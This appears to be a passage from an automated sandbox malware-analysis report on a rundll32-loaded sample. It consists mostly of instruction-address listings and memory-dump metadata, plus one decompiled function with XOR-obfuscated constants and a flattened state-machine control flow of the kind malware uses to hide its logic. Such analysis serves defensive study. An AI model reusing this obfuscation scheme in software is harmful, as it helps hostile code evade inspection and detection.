                                                                                                                                                            0x0038f6d1
                                                                                                                                                            0x0038f6dc
                                                                                                                                                            0x0038f6e7
                                                                                                                                                            0x0038f6f2
                                                                                                                                                            0x0038f6fa
                                                                                                                                                            0x0038f705
                                                                                                                                                            0x0038f710
                                                                                                                                                            0x0038f71b
                                                                                                                                                            0x0038f723
                                                                                                                                                            0x0038f72e
                                                                                                                                                            0x0038f739
                                                                                                                                                            0x0038f744
                                                                                                                                                            0x0038f74f
                                                                                                                                                            0x0038f757
                                                                                                                                                            0x0038f765
                                                                                                                                                            0x0038f76a
                                                                                                                                                            0x0038f76e
                                                                                                                                                            0x0038f776
                                                                                                                                                            0x0038f77e
                                                                                                                                                            0x0038f789
                                                                                                                                                            0x0038f793
                                                                                                                                                            0x0038f794
                                                                                                                                                            0x0038f79b
                                                                                                                                                            0x0038f7a6
                                                                                                                                                            0x0038f7b1
                                                                                                                                                            0x0038f7bc
                                                                                                                                                            0x0038f7c7
                                                                                                                                                            0x0038f7cf
                                                                                                                                                            0x0038f7df
                                                                                                                                                            0x0038f7e3
                                                                                                                                                            0x0038f7eb
                                                                                                                                                            0x0038f7f3
                                                                                                                                                            0x0038f7fb
                                                                                                                                                            0x0038f800
                                                                                                                                                            0x0038f808
                                                                                                                                                            0x0038f810
                                                                                                                                                            0x0038f818
                                                                                                                                                            0x0038f820
                                                                                                                                                            0x0038f825
                                                                                                                                                            0x0038f82d
                                                                                                                                                            0x0038f838
                                                                                                                                                            0x0038f840
                                                                                                                                                            0x0038f84b
                                                                                                                                                            0x0038f856
                                                                                                                                                            0x0038f86a
                                                                                                                                                            0x0038f871
                                                                                                                                                            0x0038f87c
                                                                                                                                                            0x0038f887
                                                                                                                                                            0x0038f88f
                                                                                                                                                            0x0038f897
                                                                                                                                                            0x0038f8a2
                                                                                                                                                            0x0038f8aa
                                                                                                                                                            0x0038f8b7
                                                                                                                                                            0x0038f8bb
                                                                                                                                                            0x0038f8c3
                                                                                                                                                            0x0038f8cb
                                                                                                                                                            0x0038f8d3
                                                                                                                                                            0x0038f8db
                                                                                                                                                            0x0038f8e3
                                                                                                                                                            0x0038f8e8
                                                                                                                                                            0x0038f8f0
                                                                                                                                                            0x0038f8fb
                                                                                                                                                            0x0038f903
                                                                                                                                                            0x0038f90e
                                                                                                                                                            0x0038f919
                                                                                                                                                            0x0038f921
                                                                                                                                                            0x0038f929
                                                                                                                                                            0x0038f930
                                                                                                                                                            0x0038f938
                                                                                                                                                            0x0038f940
                                                                                                                                                            0x0038f947
                                                                                                                                                            0x0038f94a
                                                                                                                                                            0x0038f94b
                                                                                                                                                            0x0038f94f
                                                                                                                                                            0x0038f954
                                                                                                                                                            0x0038f958
                                                                                                                                                            0x0038f960
                                                                                                                                                            0x0038f968
                                                                                                                                                            0x0038f973
                                                                                                                                                            0x0038f97e
                                                                                                                                                            0x0038f989
                                                                                                                                                            0x0038f99c
                                                                                                                                                            0x0038f9a3
                                                                                                                                                            0x0038f9ae
                                                                                                                                                            0x0038f9b9
                                                                                                                                                            0x0038f9c1
                                                                                                                                                            0x0038f9c6
                                                                                                                                                            0x0038f9ca
                                                                                                                                                            0x0038f9cf
                                                                                                                                                            0x0038f9d7
                                                                                                                                                            0x0038f9e4
                                                                                                                                                            0x0038f9e8
                                                                                                                                                            0x0038f9ed
                                                                                                                                                            0x0038f9f2
                                                                                                                                                            0x0038f9fa
                                                                                                                                                            0x0038fa05
                                                                                                                                                            0x0038fa10
                                                                                                                                                            0x0038fa1b
                                                                                                                                                            0x0038fa26
                                                                                                                                                            0x0038fa31
                                                                                                                                                            0x0038fa3c
                                                                                                                                                            0x0038fa47
                                                                                                                                                            0x0038fa52
                                                                                                                                                            0x0038fa5d
                                                                                                                                                            0x0038fa68
                                                                                                                                                            0x0038fa73
                                                                                                                                                            0x0038fa7b
                                                                                                                                                            0x0038fa8b
                                                                                                                                                            0x0038fa8f
                                                                                                                                                            0x0038fa97
                                                                                                                                                            0x0038faa7
                                                                                                                                                            0x0038faab
                                                                                                                                                            0x0038fab0
                                                                                                                                                            0x0038fab5
                                                                                                                                                            0x0038fabd
                                                                                                                                                            0x0038fac5
                                                                                                                                                            0x0038facd
                                                                                                                                                            0x0038fad2
                                                                                                                                                            0x0038fada
                                                                                                                                                            0x0038fae2
                                                                                                                                                            0x0038faea
                                                                                                                                                            0x0038faf2
                                                                                                                                                            0x0038fafa
                                                                                                                                                            0x0038fb05
                                                                                                                                                            0x0038fb0d
                                                                                                                                                            0x0038fb18
                                                                                                                                                            0x0038fb25
                                                                                                                                                            0x0038fb29
                                                                                                                                                            0x0038fb31
                                                                                                                                                            0x0038fb39
                                                                                                                                                            0x0038fb41
                                                                                                                                                            0x0038fb49
                                                                                                                                                            0x0038fb4e
                                                                                                                                                            0x0038fb5c
                                                                                                                                                            0x0038fb62
                                                                                                                                                            0x0038fb6a
                                                                                                                                                            0x0038fb79
                                                                                                                                                            0x0038fb7c
                                                                                                                                                            0x0038fb83
                                                                                                                                                            0x0038fb87
                                                                                                                                                            0x0038fb8c
                                                                                                                                                            0x0038fb94
                                                                                                                                                            0x0038fbaa
                                                                                                                                                            0x0038fbb1
                                                                                                                                                            0x0038fbb8
                                                                                                                                                            0x0038fbc3
                                                                                                                                                            0x0038fbd0
                                                                                                                                                            0x0038fbd1
                                                                                                                                                            0x0038fbda
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 4`2$:B8$;r$[h~$y8$|%$&e$0{
                                                                                                                                                            • API String ID: 0-4140840388
                                                                                                                                                            • Opcode ID: 7b98d438123a156397cf6e07be6ea1e6d04070b04520a646f39c9bd5ad59e55f
                                                                                                                                                            • Instruction ID: fac29024cd48fe1532f8eb2600d4b0f05ca6911e435de532fce5c3beb7d84a17
                                                                                                                                                            • Opcode Fuzzy Hash: 7b98d438123a156397cf6e07be6ea1e6d04070b04520a646f39c9bd5ad59e55f
                                                                                                                                                            • Instruction Fuzzy Hash: FC5240725093808FD3B9DF25C58AB8BFBE1BBC4308F10891DE19996260DBB49949CF43
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Version$ClipboardFormatRegister
                                                                                                                                                            • String ID: MSWHEEL_ROLLMSG
                                                                                                                                                            • API String ID: 2888461884-2485103130
                                                                                                                                                            • Opcode ID: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                                                            • Instruction ID: 7f315ad506f9c9b1e51aced78a2c78e4f88a242cc2e5f9aa46fc8e210ad3a912
                                                                                                                                                            • Opcode Fuzzy Hash: 0b261e62a9b93fa42ba21c75ed12931f30ea3bbfc1f984ccee5831c20ba1f621
                                                                                                                                                            • Instruction Fuzzy Hash: 94E0483680016396F3019764AD447A43AD4D7896D7F324037DE00C2551DA6609C3866D
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 79%
                                                                                                                                                            			E0038CB5B(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                            				char _v520;
                                                                                                                                                            				char _v1040;
                                                                                                                                                            				char _v1560;
                                                                                                                                                            				intOrPtr _v1564;
                                                                                                                                                            				intOrPtr _v1568;
                                                                                                                                                            				intOrPtr _v1572;
                                                                                                                                                            				signed int _v1576;
                                                                                                                                                            				signed int _v1580;
                                                                                                                                                            				signed int _v1584;
                                                                                                                                                            				signed int _v1588;
                                                                                                                                                            				signed int _v1592;
                                                                                                                                                            				signed int _v1596;
                                                                                                                                                            				signed int _v1600;
                                                                                                                                                            				signed int _v1604;
                                                                                                                                                            				signed int _v1608;
                                                                                                                                                            				signed int _v1612;
                                                                                                                                                            				signed int _v1616;
                                                                                                                                                            				signed int _v1620;
                                                                                                                                                            				signed int _v1624;
                                                                                                                                                            				signed int _v1628;
                                                                                                                                                            				signed int _v1632;
                                                                                                                                                            				signed int _v1636;
                                                                                                                                                            				signed int _v1640;
                                                                                                                                                            				signed int _v1644;
                                                                                                                                                            				signed int _v1648;
                                                                                                                                                            				signed int _v1652;
                                                                                                                                                            				signed int _v1656;
                                                                                                                                                            				signed int _v1660;
                                                                                                                                                            				signed int _v1664;
                                                                                                                                                            				signed int _v1668;
                                                                                                                                                            				signed int _v1672;
                                                                                                                                                            				signed int _v1676;
                                                                                                                                                            				signed int _v1680;
                                                                                                                                                            				signed int _v1684;
                                                                                                                                                            				signed int _v1688;
                                                                                                                                                            				signed int _v1692;
                                                                                                                                                            				signed int _v1696;
                                                                                                                                                            				signed int _v1700;
                                                                                                                                                            				signed int _v1704;
                                                                                                                                                            				signed int _v1708;
                                                                                                                                                            				void* _t341;
                                                                                                                                                            				void* _t370;
                                                                                                                                                            				void* _t379;
                                                                                                                                                            				intOrPtr _t382;
                                                                                                                                                            				intOrPtr _t385;
                                                                                                                                                            				void* _t396;
                                                                                                                                                            				intOrPtr _t399;
                                                                                                                                                            				intOrPtr _t436;
                                                                                                                                                            				signed int _t437;
                                                                                                                                                            				signed int _t438;
                                                                                                                                                            				signed int _t439;
                                                                                                                                                            				signed int _t440;
                                                                                                                                                            				signed int _t441;
                                                                                                                                                            				signed int _t442;
                                                                                                                                                            				signed int _t443;
                                                                                                                                                            				signed int _t444;
                                                                                                                                                            				signed int* _t449;
                                                                                                                                                            
                                                                                                                                                            				_push(_a12);
                                                                                                                                                            				_t436 = 0;
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				_push(0);
                                                                                                                                                            				E003820B9(_t341);
                                                                                                                                                            				_v1572 = 0xe82680;
                                                                                                                                                            				_t449 =  &(( &_v1708)[5]);
                                                                                                                                                            				_v1568 = 0;
                                                                                                                                                            				_v1564 = 0;
                                                                                                                                                            				_t396 = 0x9368da1;
                                                                                                                                                            				_v1584 = 0x42403b;
                                                                                                                                                            				_v1584 = _v1584 + 0xffffd771;
                                                                                                                                                            				_v1584 = _v1584 ^ 0x00421785;
                                                                                                                                                            				_v1692 = 0xc00255;
                                                                                                                                                            				_t437 = 0x16;
                                                                                                                                                            				_v1692 = _v1692 / _t437;
                                                                                                                                                            				_v1692 = _v1692 + 0xffff6b87;
                                                                                                                                                            				_v1692 = _v1692 + 0xffff176e;
                                                                                                                                                            				_v1692 = _v1692 ^ 0x0004c90f;
                                                                                                                                                            				_v1668 = 0x5abcaa;
                                                                                                                                                            				_v1668 = _v1668 | 0xa6adf3e3;
                                                                                                                                                            				_v1668 = _v1668 + 0xffff713c;
                                                                                                                                                            				_v1668 = _v1668 << 6;
                                                                                                                                                            				_v1668 = _v1668 ^ 0xbfd49dc8;
                                                                                                                                                            				_v1700 = 0xb35187;
                                                                                                                                                            				_v1700 = _v1700 | 0x50a44dff;
                                                                                                                                                            				_v1700 = _v1700 + 0xfffff2e6;
                                                                                                                                                            				_v1700 = _v1700 >> 8;
                                                                                                                                                            				_v1700 = _v1700 ^ 0x0051b9c1;
                                                                                                                                                            				_v1644 = 0x4d7cc3;
                                                                                                                                                            				_v1644 = _v1644 + 0xffffa786;
                                                                                                                                                            				_v1644 = _v1644 | 0x8b8a715e;
                                                                                                                                                            				_v1644 = _v1644 ^ 0x6234f021;
                                                                                                                                                            				_v1644 = _v1644 ^ 0xe9f998a6;
                                                                                                                                                            				_v1624 = 0x204c5b;
                                                                                                                                                            				_v1624 = _v1624 + 0xffffa901;
                                                                                                                                                            				_v1624 = _v1624 + 0x49e1;
                                                                                                                                                            				_v1624 = _v1624 ^ 0x002fe6aa;
                                                                                                                                                            				_v1632 = 0xbb0a9b;
                                                                                                                                                            				_v1632 = _v1632 * 0x52;
                                                                                                                                                            				_v1632 = _v1632 | 0x83893080;
                                                                                                                                                            				_v1632 = _v1632 ^ 0xbbe905c0;
                                                                                                                                                            				_v1620 = 0x19fb1a;
                                                                                                                                                            				_v1620 = _v1620 | 0x985eae3d;
                                                                                                                                                            				_v1620 = _v1620 + 0xf613;
                                                                                                                                                            				_v1620 = _v1620 ^ 0x9864c971;
                                                                                                                                                            				_v1656 = 0x35ecb4;
                                                                                                                                                            				_v1656 = _v1656 * 0x29;
                                                                                                                                                            				_v1656 = _v1656 + 0x1081;
                                                                                                                                                            				_v1656 = _v1656 + 0xffffd324;
                                                                                                                                                            				_v1656 = _v1656 ^ 0x08a8fe56;
                                                                                                                                                            				_v1580 = 0xc60f6f;
                                                                                                                                                            				_v1580 = _v1580 + 0xffffd3e6;
                                                                                                                                                            				_v1580 = _v1580 ^ 0x00c233ea;
                                                                                                                                                            				_v1664 = 0x2df5c;
                                                                                                                                                            				_v1664 = _v1664 << 8;
                                                                                                                                                            				_v1664 = _v1664 * 0x4c;
                                                                                                                                                            				_v1664 = _v1664 + 0xffffaed7;
                                                                                                                                                            				_v1664 = _v1664 ^ 0xda40187b;
                                                                                                                                                            				_v1672 = 0x38409b;
                                                                                                                                                            				_v1672 = _v1672 * 0x33;
                                                                                                                                                            				_v1672 = _v1672 | 0x7fcdffbb;
                                                                                                                                                            				_v1672 = _v1672 ^ 0x7ff87770;
                                                                                                                                                            				_v1680 = 0xe751cb;
                                                                                                                                                            				_v1680 = _v1680 ^ 0x8590ed7d;
                                                                                                                                                            				_v1680 = _v1680 + 0xffffebc9;
                                                                                                                                                            				_v1680 = _v1680 * 0x5e;
                                                                                                                                                            				_v1680 = _v1680 ^ 0x01e2719c;
                                                                                                                                                            				_v1688 = 0x15e1cd;
                                                                                                                                                            				_v1688 = _v1688 + 0xfe19;
                                                                                                                                                            				_v1688 = _v1688 + 0xffffc88c;
                                                                                                                                                            				_v1688 = _v1688 << 7;
                                                                                                                                                            				_v1688 = _v1688 ^ 0x0b5f3deb;
                                                                                                                                                            				_v1696 = 0x33a377;
                                                                                                                                                            				_v1696 = _v1696 << 0xa;
                                                                                                                                                            				_v1696 = _v1696 ^ 0xfb2d04b5;
                                                                                                                                                            				_v1696 = _v1696 | 0xd2f07883;
                                                                                                                                                            				_v1696 = _v1696 ^ 0xf7fa7ce3;
                                                                                                                                                            				_v1640 = 0x94004d;
                                                                                                                                                            				_v1640 = _v1640 >> 0xa;
                                                                                                                                                            				_t438 = 0x67;
                                                                                                                                                            				_v1640 = _v1640 * 0x3d;
                                                                                                                                                            				_v1640 = _v1640 >> 7;
                                                                                                                                                            				_v1640 = _v1640 ^ 0x00039ca1;
                                                                                                                                                            				_v1648 = 0xfcfef3;
                                                                                                                                                            				_v1648 = _v1648 * 0x18;
                                                                                                                                                            				_v1648 = _v1648 + 0x9c71;
                                                                                                                                                            				_v1648 = _v1648 | 0xf5d6202a;
                                                                                                                                                            				_v1648 = _v1648 ^ 0xf7f57601;
                                                                                                                                                            				_v1596 = 0xc58f80;
                                                                                                                                                            				_v1596 = _v1596 + 0xffff2f17;
                                                                                                                                                            				_v1596 = _v1596 ^ 0x00ce700d;
                                                                                                                                                            				_v1684 = 0xee980b;
                                                                                                                                                            				_v1684 = _v1684 >> 6;
                                                                                                                                                            				_v1684 = _v1684 / _t438;
                                                                                                                                                            				_v1684 = _v1684 + 0xffff2a3f;
                                                                                                                                                            				_v1684 = _v1684 ^ 0xfff3655c;
                                                                                                                                                            				_v1652 = 0x45a4a9;
                                                                                                                                                            				_v1652 = _v1652 >> 0xe;
                                                                                                                                                            				_t439 = 0x6e;
                                                                                                                                                            				_v1652 = _v1652 * 0x51;
                                                                                                                                                            				_v1652 = _v1652 + 0x9be3;
                                                                                                                                                            				_v1652 = _v1652 ^ 0x0004d4d8;
                                                                                                                                                            				_v1708 = 0x222243;
                                                                                                                                                            				_t176 =  &_v1708; // 0x222243
                                                                                                                                                            				_v1708 =  *_t176 / _t439;
                                                                                                                                                            				_v1708 = _v1708 << 9;
                                                                                                                                                            				_v1708 = _v1708 + 0xffff4a12;
                                                                                                                                                            				_v1708 = _v1708 ^ 0x009b5339;
                                                                                                                                                            				_v1612 = 0x464ea3;
                                                                                                                                                            				_v1612 = _v1612 + 0x89cc;
                                                                                                                                                            				_v1612 = _v1612 >> 2;
                                                                                                                                                            				_v1612 = _v1612 ^ 0x00167067;
                                                                                                                                                            				_v1588 = 0xd74d9e;
                                                                                                                                                            				_v1588 = _v1588 | 0x529da741;
                                                                                                                                                            				_v1588 = _v1588 ^ 0x52d09c78;
                                                                                                                                                            				_v1628 = 0x60b5eb;
                                                                                                                                                            				_v1628 = _v1628 >> 9;
                                                                                                                                                            				_t440 = 0x19;
                                                                                                                                                            				_v1628 = _v1628 / _t440;
                                                                                                                                                            				_v1628 = _v1628 ^ 0x000ff1bc;
                                                                                                                                                            				_v1676 = 0xfb7b01;
                                                                                                                                                            				_v1676 = _v1676 << 4;
                                                                                                                                                            				_v1676 = _v1676 + 0xffffc28e;
                                                                                                                                                            				_t441 = 0x1b;
                                                                                                                                                            				_v1676 = _v1676 / _t441;
                                                                                                                                                            				_v1676 = _v1676 ^ 0x0096cb21;
                                                                                                                                                            				_v1660 = 0xed67c1;
                                                                                                                                                            				_v1660 = _v1660 << 0xa;
                                                                                                                                                            				_v1660 = _v1660 | 0xef7d69c8;
                                                                                                                                                            				_v1660 = _v1660 << 2;
                                                                                                                                                            				_v1660 = _v1660 ^ 0xfff42fe1;
                                                                                                                                                            				_v1604 = 0x46c7e8;
                                                                                                                                                            				_v1604 = _v1604 << 0xf;
                                                                                                                                                            				_v1604 = _v1604 ^ 0x63fe3710;
                                                                                                                                                            				_v1636 = 0x7a345b;
                                                                                                                                                            				_v1636 = _v1636 + 0xd479;
                                                                                                                                                            				_v1636 = _v1636 + 0x8c7f;
                                                                                                                                                            				_v1636 = _v1636 ^ 0x00708a00;
                                                                                                                                                            				_v1704 = 0x80508e;
                                                                                                                                                            				_v1704 = _v1704 ^ 0xf958081f;
                                                                                                                                                            				_t442 = 0x4b;
                                                                                                                                                            				_v1704 = _v1704 / _t442;
                                                                                                                                                            				_t443 = 0x34;
                                                                                                                                                            				_v1704 = _v1704 * 0x44;
                                                                                                                                                            				_v1704 = _v1704 ^ 0xe2885afb;
                                                                                                                                                            				_v1576 = 0x325f4f;
                                                                                                                                                            				_t259 =  &_v1576; // 0x325f4f
                                                                                                                                                            				_v1576 =  *_t259 * 0x7a;
                                                                                                                                                            				_v1576 = _v1576 ^ 0x180920ed;
                                                                                                                                                            				_v1592 = 0xd554f9;
                                                                                                                                                            				_v1592 = _v1592 * 0x4e;
                                                                                                                                                            				_v1592 = _v1592 ^ 0x40f8e8dd;
                                                                                                                                                            				_v1608 = 0x6be570;
                                                                                                                                                            				_v1608 = _v1608 + 0x3d4f;
                                                                                                                                                            				_v1608 = _v1608 ^ 0x4461575c;
                                                                                                                                                            				_v1608 = _v1608 ^ 0x440eeedf;
                                                                                                                                                            				_v1616 = 0x4acfbf;
                                                                                                                                                            				_v1616 = _v1616 / _t443;
                                                                                                                                                            				_t444 = 0xe;
                                                                                                                                                            				_v1616 = _v1616 / _t444;
                                                                                                                                                            				_v1616 = _v1616 ^ 0x000fdd65;
                                                                                                                                                            				_v1600 = 0x55de88;
                                                                                                                                                            				_v1600 = _v1600 << 2;
                                                                                                                                                            				_v1600 = _v1600 ^ 0x01580110;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t396 != 0x196a97b) {
                                                                                                                                                            						if(_t396 == 0x2ca432c) {
                                                                                                                                                            							_push(_v1652);
                                                                                                                                                            							_push(_v1684);
                                                                                                                                                            							_t379 = E0038DCF7(_v1596, 0x3710f0, __eflags);
                                                                                                                                                            							E0038176B( &_v1560, __eflags);
                                                                                                                                                            							_t382 =  *0x393e10; // 0x0
                                                                                                                                                            							_t385 =  *0x393e10; // 0x0
                                                                                                                                                            							E0038E32E(_v1612, __eflags, _t379, _v1588,  &_v1040, _v1628, _t385 + 0x23c, _v1676,  &_v520, _v1660, _v1604, _v1636, _t436, _t382 + 0x1c,  &_v1560);
                                                                                                                                                            							E0037A8B0(_v1704, _t379, _v1576);
                                                                                                                                                            							_t449 =  &(_t449[0xf]);
                                                                                                                                                            							_t396 = 0x9d0e956;
                                                                                                                                                            							continue;
                                                                                                                                                            						} else {
                                                                                                                                                            							if(_t396 == 0x9368da1) {
                                                                                                                                                            								_push(_v1644);
                                                                                                                                                            								_push(_v1584);
                                                                                                                                                            								_push(_v1700);
                                                                                                                                                            								_push( &_v1040);
                                                                                                                                                            								E003846BB(_v1692, _v1668);
                                                                                                                                                            								_t449 = _t449 - 0xc + 0x1c;
                                                                                                                                                            								_t396 = 0x196a97b;
                                                                                                                                                            								continue;
                                                                                                                                                            							} else {
                                                                                                                                                            								_t456 = _t396 - 0x9d0e956;
                                                                                                                                                            								if(_t396 != 0x9d0e956) {
                                                                                                                                                            									goto L10;
                                                                                                                                                            								} else {
                                                                                                                                                            									_push(_v1600);
                                                                                                                                                            									_push(_t436);
                                                                                                                                                            									_push(_t396);
                                                                                                                                                            									_push(_t436);
                                                                                                                                                            									_push(_t436);
                                                                                                                                                            									_push(_v1616);
                                                                                                                                                            									_push( &_v520);
                                                                                                                                                            									E0037AB87(_v1592, _v1608, _t456);
                                                                                                                                                            									_t436 =  !=  ? 1 : _t436;
                                                                                                                                                            								}
                                                                                                                                                            							}
                                                                                                                                                            						}
                                                                                                                                                            						L6:
                                                                                                                                                            						return _t436;
                                                                                                                                                            					}
                                                                                                                                                            					_push(_v1620);
                                                                                                                                                            					_push(_v1632);
                                                                                                                                                            					_t370 = E0038DCF7(_v1624, 0x371020, __eflags);
                                                                                                                                                            					E0038176B( &_v1560, __eflags);
                                                                                                                                                            					_t399 =  *0x393e10; // 0x0
                                                                                                                                                            					_t336 = _t399 + 0x1c; // 0x1c
                                                                                                                                                            					_t337 = _t399 + 0x23c; // 0x23c
                                                                                                                                                            					E00381652(_v1580, __eflags, _t337, _t336, _v1664, _v1672, _t370, 0x104,  &_v520, _v1680,  &_v1040, _v1688,  &_v1560, _v1696);
                                                                                                                                                            					E0037A8B0(_v1640, _t370, _v1648);
                                                                                                                                                            					_t449 =  &(_t449[0xf]);
                                                                                                                                                            					_t396 = 0x9d0e956;
                                                                                                                                                            					L10:
                                                                                                                                                            					__eflags = _t396 - 0xce3b296;
                                                                                                                                                            				} while (__eflags != 0);
                                                                                                                                                            				goto L6;
                                                                                                                                                            			}

                                                                                                                                                            0x0038ccaf
                                                                                                                                                            0x0038ccb7
                                                                                                                                                            0x0038ccbf
                                                                                                                                                            0x0038ccc7
                                                                                                                                                            0x0038ccd4
                                                                                                                                                            0x0038ccd8
                                                                                                                                                            0x0038cce0
                                                                                                                                                            0x0038cce8
                                                                                                                                                            0x0038ccf0
                                                                                                                                                            0x0038ccfb
                                                                                                                                                            0x0038cd06
                                                                                                                                                            0x0038cd11
                                                                                                                                                            0x0038cd19
                                                                                                                                                            0x0038cd23
                                                                                                                                                            0x0038cd27
                                                                                                                                                            0x0038cd2f
                                                                                                                                                            0x0038cd37
                                                                                                                                                            0x0038cd44
                                                                                                                                                            0x0038cd48
                                                                                                                                                            0x0038cd50
                                                                                                                                                            0x0038cd58
                                                                                                                                                            0x0038cd60
                                                                                                                                                            0x0038cd68
                                                                                                                                                            0x0038cd75
                                                                                                                                                            0x0038cd7b
                                                                                                                                                            0x0038cd83
                                                                                                                                                            0x0038cd8b
                                                                                                                                                            0x0038cd93
                                                                                                                                                            0x0038cd9b
                                                                                                                                                            0x0038cda0
                                                                                                                                                            0x0038cda8
                                                                                                                                                            0x0038cdb0
                                                                                                                                                            0x0038cdb5
                                                                                                                                                            0x0038cdbd
                                                                                                                                                            0x0038cdc5
                                                                                                                                                            0x0038cdcd
                                                                                                                                                            0x0038cdd5
                                                                                                                                                            0x0038cde1
                                                                                                                                                            0x0038cde4
                                                                                                                                                            0x0038cde8
                                                                                                                                                            0x0038cded
                                                                                                                                                            0x0038cdf5
                                                                                                                                                            0x0038ce02
                                                                                                                                                            0x0038ce06
                                                                                                                                                            0x0038ce0e
                                                                                                                                                            0x0038ce16
                                                                                                                                                            0x0038ce1e
                                                                                                                                                            0x0038ce29
                                                                                                                                                            0x0038ce34
                                                                                                                                                            0x0038ce3f
                                                                                                                                                            0x0038ce47
                                                                                                                                                            0x0038ce54
                                                                                                                                                            0x0038ce58
                                                                                                                                                            0x0038ce60
                                                                                                                                                            0x0038ce68
                                                                                                                                                            0x0038ce70
                                                                                                                                                            0x0038ce7a
                                                                                                                                                            0x0038ce7d
                                                                                                                                                            0x0038ce81
                                                                                                                                                            0x0038ce89
                                                                                                                                                            0x0038ce91
                                                                                                                                                            0x0038ce99
                                                                                                                                                            0x0038cea1
                                                                                                                                                            0x0038cea5
                                                                                                                                                            0x0038ceaa
                                                                                                                                                            0x0038ceb2
                                                                                                                                                            0x0038ceba
                                                                                                                                                            0x0038cec2
                                                                                                                                                            0x0038ceca
                                                                                                                                                            0x0038cecf
                                                                                                                                                            0x0038ced7
                                                                                                                                                            0x0038cee2
                                                                                                                                                            0x0038ceed
                                                                                                                                                            0x0038cef8
                                                                                                                                                            0x0038cf00
                                                                                                                                                            0x0038cf09
                                                                                                                                                            0x0038cf0e
                                                                                                                                                            0x0038cf14
                                                                                                                                                            0x0038cf1c
                                                                                                                                                            0x0038cf24
                                                                                                                                                            0x0038cf29
                                                                                                                                                            0x0038cf35
                                                                                                                                                            0x0038cf38
                                                                                                                                                            0x0038cf3c
                                                                                                                                                            0x0038cf44
                                                                                                                                                            0x0038cf4c
                                                                                                                                                            0x0038cf51
                                                                                                                                                            0x0038cf5b
                                                                                                                                                            0x0038cf65
                                                                                                                                                            0x0038cf72
                                                                                                                                                            0x0038cf7a
                                                                                                                                                            0x0038cf7f
                                                                                                                                                            0x0038cf87
                                                                                                                                                            0x0038cf8f
                                                                                                                                                            0x0038cf97
                                                                                                                                                            0x0038cf9f
                                                                                                                                                            0x0038cfa7
                                                                                                                                                            0x0038cfaf
                                                                                                                                                            0x0038cfbd
                                                                                                                                                            0x0038cfc2
                                                                                                                                                            0x0038cfcd
                                                                                                                                                            0x0038cfd0
                                                                                                                                                            0x0038cfd4
                                                                                                                                                            0x0038cfdc
                                                                                                                                                            0x0038cfe7
                                                                                                                                                            0x0038cfef
                                                                                                                                                            0x0038cff6
                                                                                                                                                            0x0038d001
                                                                                                                                                            0x0038d014
                                                                                                                                                            0x0038d01b
                                                                                                                                                            0x0038d026
                                                                                                                                                            0x0038d02e
                                                                                                                                                            0x0038d036
                                                                                                                                                            0x0038d03e
                                                                                                                                                            0x0038d046
                                                                                                                                                            0x0038d056
                                                                                                                                                            0x0038d05e
                                                                                                                                                            0x0038d061
                                                                                                                                                            0x0038d065
                                                                                                                                                            0x0038d06d
                                                                                                                                                            0x0038d075
                                                                                                                                                            0x0038d07a
                                                                                                                                                            0x0038d082
                                                                                                                                                            0x0038d082
                                                                                                                                                            0x0038d090
                                                                                                                                                            0x0038d119
                                                                                                                                                            0x0038d122
                                                                                                                                                            0x0038d12d
                                                                                                                                                            0x0038d13b
                                                                                                                                                            0x0038d149
                                                                                                                                                            0x0038d16e
                                                                                                                                                            0x0038d19b
                                                                                                                                                            0x0038d1ad
                                                                                                                                                            0x0038d1b2
                                                                                                                                                            0x0038d1b5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038d096
                                                                                                                                                            0x0038d09c
                                                                                                                                                            0x0038d0e8
                                                                                                                                                            0x0038d0f3
                                                                                                                                                            0x0038d0fa
                                                                                                                                                            0x0038d109
                                                                                                                                                            0x0038d10a
                                                                                                                                                            0x0038d10f
                                                                                                                                                            0x0038d112
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038d09e
                                                                                                                                                            0x0038d09e
                                                                                                                                                            0x0038d0a0
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038d0a6
                                                                                                                                                            0x0038d0a6
                                                                                                                                                            0x0038d0b1
                                                                                                                                                            0x0038d0b2
                                                                                                                                                            0x0038d0b3
                                                                                                                                                            0x0038d0b4
                                                                                                                                                            0x0038d0b5
                                                                                                                                                            0x0038d0ca
                                                                                                                                                            0x0038d0cb
                                                                                                                                                            0x0038d0d8
                                                                                                                                                            0x0038d0d8
                                                                                                                                                            0x0038d0a0
